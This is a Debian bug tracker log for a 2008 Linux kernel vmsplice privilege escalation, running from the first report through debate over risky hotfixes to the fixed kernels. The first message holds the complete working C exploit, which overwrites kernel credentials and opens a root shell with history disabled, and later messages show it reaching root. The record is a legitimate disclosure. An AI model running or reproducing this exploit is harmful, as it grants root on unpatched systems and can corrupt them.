Debian Bug report logs - #464953
linux-2.6: mmap() local root exploit


Package: linux-2.6; Maintainer for linux-2.6 is Debian Kernel Team <debian-kernel@lists.debian.org>;

Reported by: William Pitcock <nenolod@sacredspiral.co.uk>

Date: Sun, 10 Feb 2008 01:33:02 UTC

Severity: critical

Tags: patch, security

Merged with 464945, 465246

Found in versions 2.6.18.dfsg.1-17etch1, 2.6.22-3-generic, 2.6.17-1

Fixed in versions 2.6.24-4, 2.6.18.dfsg.1-18etch1, 2.6.22-6.lenny1

Done: Bastian Blank <waldi@debian.org>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to William Pitcock <nenolod@sacredspiral.co.uk>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: William Pitcock <nenolod@sacredspiral.co.uk>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: linux-2.6: mmap() local root exploit
Date: Sat, 09 Feb 2008 19:29:53 -0600
Package: linux-2.6
Version: 2.6.22-3-generic
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by
Debian, including Etch's kernel.

The attached exploit code can be used to test whether a kernel is vulnerable;
if it is, it starts a root shell.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-generic (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

*** proof-of-concept.c
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

/*
 * Print a "[-] msg" diagnostic line, flush both standard streams and
 * terminate the process with exit status 1. Never returns.
 *
 * msg: short description of what failed.
 * err: errno value to describe; when non-zero, ": strerror(err)" is
 *      appended to the message, when zero only msg is printed.
 *
 * The format string is selected from two fixed literals, so no
 * caller-controlled text is ever used as a printf format. strerror(err)
 * is evaluated on every call, including err == 0, where the chosen format
 * simply ignores the extra argument.
 */
void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}




Merged 464945 464953. Request was from Gregory Colpart <reg@evolix.fr> to control@bugs.debian.org. (Sun, 10 Feb 2008 02:15:06 GMT) Full text and rfc822 format available.

Tags added: patch Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Sun, 10 Feb 2008 12:03:07 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Morten Hustveit <morten@rashbox.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #14 received at 464953@bugs.debian.org (full text, mbox):

From: Morten Hustveit <morten@rashbox.org>
To: 464953@bugs.debian.org
Subject: Hotfix
Date: Sun, 10 Feb 2008 20:38:05 +0100
Hi,

a modification of the exploit that finds the address of sys_vmsplice in the
kernel (using /proc/kallsyms) and replaces the first byte with a RET instruction
(using mmap of /dev/kmem) is available at

  http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c

-- 
Morten Hustveit




Bug marked as found in version 2.6.18.dfsg.1-17etch1. Request was from "Artur R. Czechowski" <arturcz@hell.pl> to control@bugs.debian.org. (Sun, 10 Feb 2008 19:45:04 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Ari Pollak <ari@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #21 received at 464953@bugs.debian.org (full text, mbox):

From: Ari Pollak <ari@debian.org>
To: 464953@bugs.debian.org
Subject: (no subject)
Date: Sun, 10 Feb 2008 17:00:15 -0500
Unofficial prebuilt packages are here:
http://134.2.34.20/blank/debian/linux-2.6/
as referenced here:
http://lists.debian.org/debian-kernel/2008/02/msg00363.html




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #26 received at 464953@bugs.debian.org (full text, mbox):

From: Duncan Robertson <duncan@zog.net.au>
To: 464953@bugs.debian.org
Subject: hotfix possibly unstable?
Date: Mon, 11 Feb 2008 12:04:53 +1100
Just mentioning that the hotfix mentioned here:

http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c	

appeared to have wedged (crashed hard, frozen) my machine, an otherwise
very stable Pentium 4 machine running 2.6.18-5-686 (with the nvidia
oldstable proprietary xorg drivers). Nothing in syslog, etc.







Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Duncan Robertson <duncan@zog.net.au>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #31 received at 464953@bugs.debian.org (full text, mbox):

From: Duncan Robertson <duncan@zog.net.au>
To: 464953@bugs.debian.org
Subject: follow up information
Date: Mon, 11 Feb 2008 17:35:20 +1100
Just following up: the reported problem with the security patch has not
re-occurred since rebooting (and rerunning the fix), and there has been no
problem with 2 servers patched with disable-vmsplice-if-exploitable.c either.
Also, I meant nvidia-kernel-legacy-96xx-2.6.18-5-686, not "oldstable".






Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #36 received at 464953@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 464953@bugs.debian.org
Cc: Duncan Robertson <duncan@zog.net.au>
Subject: DO NOT USE THE HOTFIX!
Date: Mon, 11 Feb 2008 09:18:48 +0100
Just for the record: Do not use the "hotfix" named disable-vmsplice-if-
exploitable.c. The hotfix first tries to run the exploit (which is
totally unnecessary for the actual "fix", by the way, and is therefore a
very dumb thing to do), and this still leads to kernel memory corruption
which will render the system unstable. You can imagine what might come
from a corrupted kernel besides a simple crash (e.g. data loss).

It should be possible to remove the actual exploit attempt from the "fix",
but there seems to be another solution which apparently compiles to a kernel
module that will catch and report attempts to (ab)use vmsplice, at
http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks




Tags added: pending Request was from Bastian Blank <waldi@alioth.debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 08:51:21 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Jon Dowland <jon+bts@alcopop.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #43 received at 464953@bugs.debian.org (full text, mbox):

From: Jon Dowland <jon+bts@alcopop.org>
To: 464953@bugs.debian.org
Subject: exploit hung my machine
Date: Mon, 11 Feb 2008 09:29:29 +0000
The exploit code (rather than the hotfix, which I didn't
try) caused my laptop to hang (ThinkPad X40 tracking sid,
one of the standard Debian kernel packages, no non-standard
modules, untainted kernel). I would not be surprised if the
reworked hotfix had the same bug in it.

We tried the hotfix on a Redhat Enterprise 5 machine at
work and that hung similarly.

The module solution Michael Holzt posted looks much safer.

-- 
Jon Dowland
ISS UNIX Team




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Mircea Gherzan <mgherzan@rdslink.ro>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #48 received at 464953@bugs.debian.org (full text, mbox):

From: Mircea Gherzan <mgherzan@rdslink.ro>
To: 464953@bugs.debian.org
Subject: seems to be fixed
Date: Mon, 11 Feb 2008 11:53:48 +0200
On a vanilla 2.6.24.2, the exploit no longer works:

-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e23000 .. 0xb7e55000
[-] vmsplice: Bad address

-- 
Mircea Gherzan
Faculty of Automatic Control and Computers
Politehnica University of Bucharest




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Nikita V. Youshchenko" <yoush@cs.msu.su>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #53 received at 464953@bugs.debian.org (full text, mbox):

From: "Nikita V. Youshchenko" <yoush@cs.msu.su>
To: 464953@bugs.debian.org
Subject: ptpatch2008.c does not work
Date: Mon, 11 Feb 2008 13:00:35 +0300
> but seems to be another solution which apparently compiles to a kernel
> module which will catch and report attempts to (ab)use vmsplice at
> http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c

I've just tried to compile this module.
It successfully insmod'ed:

Feb 11 12:54:29 zigzag kernel: ptpatch2008: init, (c) 2008 
oystein@powertech.no
Feb 11 12:54:29 zigzag kernel: ptpatch2008: syscalls c02ea3c0
Feb 11 12:54:29 zigzag kernel: hooked sys_vmsplice

However exploit code from the top of 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 still works:

nikita@zigzag:~/adm/hotfix> ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
root@zigzag:~/adm/hotfix> whoami
root




Forcibly Merged 464945 464953 465246. Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 12:57:07 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Asheesh Laroia <asheesh@asheesh.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #60 received at 464953@bugs.debian.org (full text, mbox):

From: Asheesh Laroia <asheesh@asheesh.org>
To: 464953@bugs.debian.org
Subject: Fix released
Date: Mon, 11 Feb 2008 08:12:24 -0800 (PST)
See 
http://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00056.html 
.

apt-get your way to the beautiful fixed future.

-- Asheesh.

-- 
You may worry about your hair-do today, but tomorrow much peanut butter will
be sold.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Ivan Jager <aij+debian@andrew.cmu.edu>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #65 received at 464953@bugs.debian.org (full text, mbox):

From: Ivan Jager <aij+debian@andrew.cmu.edu>
To: 464953@bugs.debian.org
Subject: Amd64 hotfix
Date: Mon, 11 Feb 2008 13:54:35 -0500 (EST)
[Message part 1 (text/plain, inline)]
I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.

It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c

Ivan
[disable-vmsplice-if-exploitable-aij.c (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Kyle McMartin <kyle@mcmartin.ca>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #70 received at 464953@bugs.debian.org (full text, mbox):

From: Kyle McMartin <kyle@mcmartin.ca>
To: Ivan Jager <aij+debian@andrew.cmu.edu>, 464953@bugs.debian.org
Subject: Re: Bug#464953: Amd64 hotfix
Date: Mon, 11 Feb 2008 14:21:25 -0500
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.
>

These "hotfixes" are so completely wrong, it's not even funny.
You're playing Russian roulette with the return value.

   0:   b8 da ff ff ff          mov    $0xffffffda,%eax
   5:   c3                      retq   

is more correct (return -ENOSYS)

regards, kyle




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #75 received at 464953@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 464953@bugs.debian.org
Cc: Ivan Jager <aij+debian@andrew.cmu.edu>
Subject: Re: Amd64 hotfix
Date: Tue, 12 Feb 2008 01:08:26 +0100
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.

Once again: The "hotfix" and also your modification are stupid, stupid,
stupid and dangerous. The "hotfix" first attempts the exploit, and
this corrupts kernel memory. It is very likely that your system will
crash shortly after, and numerous people have reported that the "hotfix"
has exactly that result, either instantaneously or after a short while.

Also, while overwriting the vmsplice syscall with a "ret" will prevent
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At the least, one should return an error. I'm
not sure if there is any software in normal use which uses vmsplice, but
keep this in mind.

And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the "de_exploit()" function and then call this
code as root? This would do the job without causing memory corruption.

But the best fix is still to just install an updated kernel and reboot.
As said, you will have to reboot anyway (but at a random time), at least when
using this stupid "hotfix" which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but in most cases I feel
that people who want to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464953; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to n0p <lbernal@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #80 received at 464953@bugs.debian.org (full text, mbox):

From: n0p <lbernal@gmail.com>
To: 464953@bugs.debian.org
Subject: The exploit corrupted the system partition
Date: Tue, 12 Feb 2008 13:38:19 -0100
[Message part 1 (text/plain, inline)]
Just FYI
The exploit corrupted the system partition (ReiserFS): a user on my server
tested the exploit and the whole root partition got corrupted and was impossible to recover.
It was a fully updated Debian Testing using the Debian default kernel on an
otherwise fully stable Pentium 4.

Next time i'll use the grsec patches and lock the fuck up of my users ¬¬
[Message part 2 (text/html, inline)]

Bug marked as fixed in version 2.6.18.dfsg.1-18etch1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:10 GMT) Full text and rfc822 format available.

Bug marked as fixed in version 2.6.22-6.lenny1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:13 GMT) Full text and rfc822 format available.

Bug marked as found in version 2.6.17-1. Request was from Stefan Fritsch <sf@debian.org> to control@bugs.debian.org. (Fri, 22 Feb 2008 19:06:16 GMT) Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 28 Mar 2008 07:39:02 GMT) Full text and rfc822 format available.


